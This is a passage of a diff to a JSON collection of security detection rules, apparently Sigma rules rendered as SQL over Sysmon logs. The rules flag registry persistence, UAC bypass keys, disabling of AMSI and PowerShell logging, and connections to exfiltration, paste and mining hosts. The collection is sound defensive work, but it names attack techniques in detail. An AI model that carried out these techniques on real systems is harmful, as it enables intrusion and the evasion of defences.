'%\\\\Microsoft\\\\Terminal Server Client\\\\Default\\\\MRU%' ESCAPE '\\') OR (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Servers\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_custom_file_open_handler_powershell_execution.yml" + "filename": "registry_delete_mstsc_history_cleared.yml" }, { - "title": "Potential Persistence Via TypedPaths", - "id": "086ae989-9ca6-4fe7-895a-759c5544f247", - "status": "experimental", - "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Removal Of AMSI Provider Registry Keys", + "id": "41d1058a-aea7-4952-9293-29eaaf516465", + "status": "test", + "description": "Detects the deletion of AMSI provider registry key entries in HKLM\\Software\\Microsoft\\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\explorer.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteKey' AND (TargetObject LIKE '%{2781761E-28E0-4109-99FE-B9D127C57AFE}' ESCAPE '\\' OR TargetObject LIKE '%{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_typed_paths.yml" + "filename": "registry_delete_removal_amsi_registry_key.yml" }, { - "title": "PowerShell Logging Disabled Via Registry Key Tampering", - "id": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", - "status": "experimental", - "description": "Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging", - "author": "frack113", + "title": "Suspicious Outbound Kerberos Connection", + "id": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", + "status": "test", + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.credential_access", + "attack.t1558", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Unknown" + "Web Browsers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\PowerShell\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\PowerShellCore\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\ModuleLogging\\\\EnableModuleLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockInvocationLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableTranscripting' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableInvocationHeader' ESCAPE '\\' OR TargetObject LIKE '%\\\\EnableScripts' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort = '88' AND Initiated = 'true') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" ], - "filename": "registry_set_powershell_logging_disabled.yml" + "filename": "net_connection_win_susp_outbound_kerberos_connection.yml" }, { - "title": "Potential EventLog File Location Tampering", - "id": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", + "title": "Equation Editor Network Connection", + "id": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", "status": "experimental", - "description": "Detects tampering with EventLog service \"file\" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting", - "author": "D3F7A5105", + "description": "Detects network connections from Equation Editor", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.t1203" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\EventLog\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\File' ESCAPE '\\') AND NOT (Details LIKE '%\\\\System32\\\\Winevt\\\\Logs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\')" ], - "filename": "registry_set_evtx_file_key_tamper.yml" + "filename": "net_connection_win_eqnedt.yml" }, { - "title": "Blue Mockingbird - Registry", - "id": "92b0b372-a939-44ed-a11b-5136cf680e27", - "status": "experimental", - "description": "Attempts to detect system changes made by Blue Mockingbird", - "author": "Trent Liffick (@tliffick)", + "title": "Download a File with IMEWDBLD.exe", + "id": "8d7e392e-9b28-49e1-831d-5949c6281228", + "status": "test", + "description": "Use IMEWDBLD.exe (built-in to windows) to download a file", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1112", - "attack.t1047" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Legitimate script" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\wercplsupport\\\\Parameters\\\\ServiceDll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND Image LIKE '%\\\\IMEWDBLD.exe' ESCAPE '\\')" ], - "filename": "registry_set_mal_blue_mockingbird.yml" + "filename": "net_connection_win_imewdbld.yml" }, { - "title": "Potential Persistence Via Outlook Today Pages", - "id": "487bb375-12ef-41f6-baae-c6a1572b4dd1", - "status": "experimental", - "description": "Detects potential persistence activity via outlook today pages. An attacker can set a custom page to execute arbitrary code and link to it via the registry key \"UserDefinedUrl\".", - "author": "Tobias Michalski (Nextron Systems)", + "title": "Microsoft Binary Suspicious Communication Endpoint", + "id": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", + "status": "test", + "description": "Detects an executable in the Windows folder accessing suspicious domains", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.lateral_movement", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Unknown", + "@subTee in your network" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Today\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%Stamp' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR TargetObject LIKE '%UserDefinedUrl' ESCAPE '\\')) AND NOT (((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\PerfLogs%' ESCAPE '\\' OR Image LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\AppData\\\\Temp\\\\%' ESCAPE '\\') AND (Initiated = 'true' AND (DestinationHostname LIKE '%.ghostbin.co' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%.hastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%.paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%.pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%anonfiles.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%ddns.net' ESCAPE '\\' OR DestinationHostname LIKE '%dl.dropboxusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%mediafire.com' ESCAPE '\\' OR DestinationHostname LIKE '%mega.nz' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.com' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.net' ESCAPE '\\' OR DestinationHostname LIKE '%send.exploit.in' ESCAPE '\\' OR DestinationHostname LIKE '%sendspace.com' ESCAPE '\\' OR DestinationHostname LIKE '%transfer.sh' ESCAPE '\\' OR DestinationHostname LIKE '%ufile.io' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_outlook_todaypage.yml" + "filename": "net_connection_win_binary_susp_com.yml" }, { - "title": "UAC Bypass via Event Viewer - Registry Set", - "id": "7c81fec3-1c1d-43b0-996a-46753041b1b6", - "status": "experimental", - "description": "Detects UAC bypass method using Windows event viewer", - "author": "Florian Roth (Nextron Systems)", + "title": "Notepad Making Network Connection", + "id": "e81528db-fc02-45e8-8e98-4e84aba1f10b", + "status": "test", + "description": "Detects suspicious network connection by Notepad", + "author": "EagleEye Team", "tags": [ + "attack.command_and_control", + "attack.execution", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\mscfile\\\\shell\\\\open\\\\command' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\notepad.exe' ESCAPE '\\' AND NOT (DestinationPort = '9100'))" ], - "filename": "registry_set_uac_bypass_eventvwr.yml" + "filename": "net_connection_win_notepad_network_connection.yml" }, { - "title": "Registry Persistence via Explorer Run Key", - "id": "b7916c2a-fa2f-4795-9477-32b731f70f11", + "title": "Silenttrinity Stager Msbuild Activity", + "id": "50e54b8d-ad73-43f8-96a1-5191685b17a4", "status": "test", - "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", - "author": "Florian Roth (Nextron Systems), oscd.community", + "description": "Detects a possible remote connections to Silenttrinity c2", + "author": "Kiran kumar s, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.execution", + "attack.t1127.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run' ESCAPE '\\') AND ((Details LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\ProgramData\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Users\\\\Default\\\\%' ESCAPE '\\') OR Details LIKE '%\\\\AppData\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' AND DestinationPort IN ('80', '443') AND Initiated = 'true')" ], - "filename": "registry_set_susp_reg_persist_explorer_run.yml" + "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml" }, { - "title": "Suspicious Environment Variable Has Been Registered", - "id": "966315ef-c5e1-4767-ba25-fce9c8de3660", - "status": "test", - "description": "Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Dropbox API Usage", + "id": "25eabf56-22f0-4915-a1ed-056b8dae0a68", + "status": "experimental", + "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Legitimate use of the API with a tool that the author wasn't aware of" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (DestinationHostname LIKE '%api.dropboxapi.com' ESCAPE '\\' OR DestinationHostname LIKE '%content.dropboxapi.com' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\Dropbox%' ESCAPE '\\'))" + ], + "filename": "net_connection_win_susp_dropbox_api.yml" + }, + { + "title": "Communication To Ngrok.Io", + "id": "18249279-932f-45e2-b37a-8925f2597670", + "status": "experimental", + "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence" + "attack.exfiltration", + "attack.t1567.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of ngrok.io" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Environment\\\\%' ESCAPE '\\') AND (Details IN ('powershell', 'pwsh') OR (Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR Details LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR Details LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR Details LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR Details LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\' OR Details LIKE '%SW52b2tlL%' ESCAPE '\\' OR Details LIKE '%ludm9rZS%' ESCAPE '\\' OR Details LIKE '%JbnZva2Ut%' ESCAPE '\\' OR Details LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR Details LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR Details LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\') OR (Details LIKE 'SUVY%' ESCAPE '\\' OR Details LIKE 'SQBFAF%' ESCAPE '\\' OR Details LIKE 'SQBuAH%' ESCAPE '\\' OR Details LIKE 'cwBhA%' ESCAPE '\\' OR Details LIKE 'aWV4%' ESCAPE '\\' OR Details LIKE 'aQBlA%' ESCAPE '\\' OR Details LIKE 'R2V0%' ESCAPE '\\' OR Details LIKE 'dmFy%' ESCAPE '\\' OR Details LIKE 'dgBhA%' ESCAPE '\\' OR Details LIKE 'dXNpbm%' ESCAPE '\\' OR Details LIKE 'H4sIA%' ESCAPE '\\' OR Details LIKE 'Y21k%' ESCAPE '\\' OR Details LIKE 'cABhAH%' ESCAPE '\\' OR Details LIKE 'Qzpc%' ESCAPE '\\' OR Details LIKE 'Yzpc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND DestinationHostname LIKE '%.ngrok.io' ESCAPE '\\')" ], - "filename": "registry_set_suspicious_env_variables.yml" + "filename": "net_connection_win_ngrok_io.yml" }, { - "title": "Potential Registry Persistence Attempt Via Windows Telemetry", - "id": "73a883d0-0348-4be4-a8d8-51031c2564f8", + "title": "Communication To Mega.nz", + "id": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", "status": "test", - "description": "Detects potential persistence behaviour using the windows telemetry registry key.\nWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", - "author": "Lednyov Alexey, oscd.community, Sreeman", + "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.exfiltration", + "attack.t1567.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of mega.nz uploaders and tools" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\TelemetryController\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Command' ESCAPE '\\' AND (Details LIKE '%.sh%' ESCAPE '\\' OR Details LIKE '%.exe%' ESCAPE '\\' OR Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.bin%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.cmd%' ESCAPE '\\' OR Details LIKE '%.js%' ESCAPE '\\' OR Details LIKE '%.ps%' ESCAPE '\\' OR Details LIKE '%.vb%' ESCAPE '\\' OR Details LIKE '%.jar%' ESCAPE '\\' OR Details LIKE '%.hta%' ESCAPE '\\' OR Details LIKE '%.msi%' ESCAPE '\\' OR Details LIKE '%.vbs%' ESCAPE '\\')) AND NOT ((Details LIKE '%\\\\system32\\\\CompatTelRunner.exe%' ESCAPE '\\' OR Details LIKE '%\\\\system32\\\\DeviceCensus.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND DestinationHostname LIKE '%api.mega.co.nz' ESCAPE '\\')" ], - "filename": "registry_set_telemetry_persistence.yml" + "filename": "net_connection_win_mega_nz.yml" }, { - "title": "UAC Bypass via Sdclt", - "id": "5b872a46-3b90-45c1-8419-f675db8053aa", - "status": "experimental", - "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)", - "author": "Omer Yampel, Christian Burkard (Nextron Systems)", + "title": "Regsvr32 Network Activity", + "id": "c7e91a02-d771-4a6d-a700-42587e0b1095", + "status": "test", + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ + "attack.execution", + "attack.t1559.001", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\exefile\\\\shell\\\\runas\\\\command\\\\isolatedCommand' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND Details REGEXP '-1[0-9]{3}\\\\Software\\\\Classes\\\\')))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')" ], - "filename": "registry_set_uac_bypass_sdclt.yml" + "filename": "net_connection_win_regsvr32_network_activity.yml" }, { - "title": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download", - "id": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", - "status": "experimental", - "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", - "author": "frack113", + "title": "Network Communication With Crypto Mining Pool", + "id": "fa5b1358-b040-4403-9868-15f7d9ab6329", + "status": "stable", + "description": "Detects initiated network connections to crypto mining pools", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.impact", + "attack.t1496" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\OneDrive\\\\UpdateOfficeConfig\\\\UpdateRingSettingURLFromOC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND DestinationHostname IN ('alimabi.cn', 'ap.luckpool.net', 'bcn.pool.minergate.com', 'bcn.vip.pool.minergate.com', 'bohemianpool.com', 'ca.minexmr.com', 'ca.monero.herominers.com', 'cbd.monerpool.org', 'cbdv2.monerpool.org', 'cryptmonero.com', 'crypto-pool.fr', 'crypto-pool.info', 'cryptonight-hub.miningpoolhub.com', 'd1pool.ddns.net', 'd5pool.us', 'daili01.monerpool.org', 'de.minexmr.com', 'dl.nbminer.com', 'donate.graef.in', 'donate.ssl.xmrig.com', 'donate.v2.xmrig.com', 'donate.xmrig.com', 'donate2.graef.in', 'drill.moneroworld.com', 'dwarfpool.com', 'emercoin.com', 'emercoin.net', 'emergate.net', 'ethereumpool.co', 'eu.luckpool.net', 'eu.minerpool.pw', 'fcn-xmr.pool.minergate.com', 'fee.xmrig.com', 'fr.minexmr.com', 'hellominer.com', 'herominers.com', 'huadong1-aeon.ppxxmr.com', 'iwanttoearn.money', 'jw-js1.ppxxmr.com', 'koto-pool.work', 'lhr.nbminer.com', 'lhr3.nbminer.com', 'linux.monerpool.org', 'lokiturtle.herominers.com', 'luckpool.net', 'masari.miner.rocks', 'mine.c3pool.com', 'mine.moneropool.com', 'mine.ppxxmr.com', 'mine.zpool.ca', 'mine1.ppxxmr.com', 'minemonero.gq', 'miner.ppxxmr.com', 'miner.rocks', 'minercircle.com', 'minergate.com', 'minerpool.pw', 'minerrocks.com', 'miners.pro', 'minerxmr.ru', 'minexmr.cn', 'minexmr.com', 'mining-help.ru', 'miningpoolhub.com', 'mixpools.org', 'moner.monerpool.org', 'moner1min.monerpool.org', 'monero-master.crypto-pool.fr', 'monero.crypto-pool.fr', 'monero.hashvault.pro', 'monero.herominers.com', 'monero.lindon-pool.win', 'monero.miners.pro', 'monero.riefly.id', 'monero.us.to', 'monerocean.stream', 'monerogb.com', 'monerohash.com', 'moneroocean.stream', 'moneropool.com', 'moneropool.nl', 'monerorx.com', 'monerpool.org', 'moriaxmr.com', 'mro.pool.minergate.com', 'multipool.us', 'myxmr.pw', 'na.luckpool.net', 'nanopool.org', 'nbminer.com', 'node3.luckpool.net', 'noobxmr.com', 'pangolinminer.comgandalph3000.com', 'pool.4i7i.com', 'pool.armornetwork.org', 'pool.cortins.tk', 'pool.gntl.co.uk', 'pool.hashvault.pro', 'pool.minergate.com', 'pool.minexmr.com', 'pool.monero.hashvault.pro', 'pool.ppxxmr.com', 'pool.somec.cc', 'pool.support', 'pool.supportxmr.com', 'pool.usa-138.com', 'pool.xmr.pt', 'pool.xmrfast.com', 'pool2.armornetwork.org', 'poolchange.ppxxmr.com', 'pooldd.com', 'poolmining.org', 'poolto.be', 'ppxvip1.ppxxmr.com', 'ppxxmr.com', 'prohash.net', 'r.twotouchauthentication.online', 'randomx.xmrig.com', 'ratchetmining.com', 'seed.emercoin.com', 'seed.emercoin.net', 'seed.emergate.net', 'seed1.joulecoin.org', 'seed2.joulecoin.org', 'seed3.joulecoin.org', 'seed4.joulecoin.org', 'seed5.joulecoin.org', 'seed6.joulecoin.org', 'seed7.joulecoin.org', 'seed8.joulecoin.org', 'sg.minexmr.com', 'sheepman.mine.bz', 'siamining.com', 'sumokoin.minerrocks.com', 'supportxmr.com', 'suprnova.cc', 'teracycle.net', 'trtl.cnpool.cc', 'trtl.pool.mine2gether.com', 'turtle.miner.rocks', 'us-west.minexmr.com', 'usxmrpool.com', 'viaxmr.com', 'webservicepag.webhop.net', 'xiazai.monerpool.org', 'xiazai1.monerpool.org', 'xmc.pool.minergate.com', 'xmo.pool.minergate.com', 'xmr-asia1.nanopool.org', 'xmr-au1.nanopool.org', 'xmr-eu1.nanopool.org', 'xmr-eu2.nanopool.org', 'xmr-jp1.nanopool.org', 'xmr-us-east1.nanopool.org', 'xmr-us-west1.nanopool.org', 'xmr-us.suprnova.cc', 'xmr-usa.dwarfpool.com', 'xmr.2miners.com', 'xmr.5b6b7b.ru', 'xmr.alimabi.cn', 'xmr.bohemianpool.com', 'xmr.crypto-pool.fr', 'xmr.crypto-pool.info', 'xmr.f2pool.com', 'xmr.hashcity.org', 'xmr.hex7e4.ru', 'xmr.ip28.net', 'xmr.monerpool.org', 'xmr.mypool.online', 'xmr.nanopool.org', 'xmr.pool.gntl.co.uk', 'xmr.pool.minergate.com', 'xmr.poolto.be', 'xmr.ppxxmr.com', 'xmr.prohash.net', 'xmr.simka.pw', 'xmr.somec.cc', 'xmr.suprnova.cc', 'xmr.usa-138.com', 'xmr.vip.pool.minergate.com', 'xmr1min.monerpool.org', 'xmrf.520fjh.org', 'xmrf.fjhan.club', 'xmrfast.com', 'xmrigcc.graef.in', 'xmrminer.cc', 'xmrpool.de', 'xmrpool.eu', 'xmrpool.me', 'xmrpool.net', 'xmrpool.xyz', 'xx11m.monerpool.org', 'xx11mv2.monerpool.org', 'xxx.hex7e4.ru', 'zarabotaibitok.ru', 'zer0day.ru'))" ], - "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml" + "filename": "net_connection_win_crypto_mining_pools.yml" }, { - "title": "Enabling COR Profiler Environment Variables", - "id": "ad89044a-8f49-4673-9a55-cbd88a1b374f", - "status": "test", - "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "title": "Script Initiated Connection to Non-Local Network", + "id": "992a6cae-db6a-43c8-9cec-76d7195c96fc", + "status": "experimental", + "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.", + "author": "frack113, Florian Roth", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.012" + "attack.command_and_control", + "attack.t1105" + ], + "falsepositives": [ + "Legitimate scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\COR\\_ENABLE\\_PROFILING' ESCAPE '\\' OR TargetObject LIKE '%\\\\COR\\_PROFILER' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND NOT (((DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '172.%' ESCAPE '\\' OR DestinationIp LIKE '192.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\'))))" ], - "filename": "registry_set_enabling_cor_profiler_env_variables.yml" + "filename": "net_connection_win_script_wan.yml" }, { - "title": "Potential Persistence Via App Paths Default Property", - "id": "707e097c-e20f-4f67-8807-1f72ff4500d6", + "title": "Communication To Ngrok Tunneling Service", + "id": "1d08ac94-400d-4469-a82f-daee9a908849", "status": "experimental", - "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. Which might be used as a method of persistence\nThe 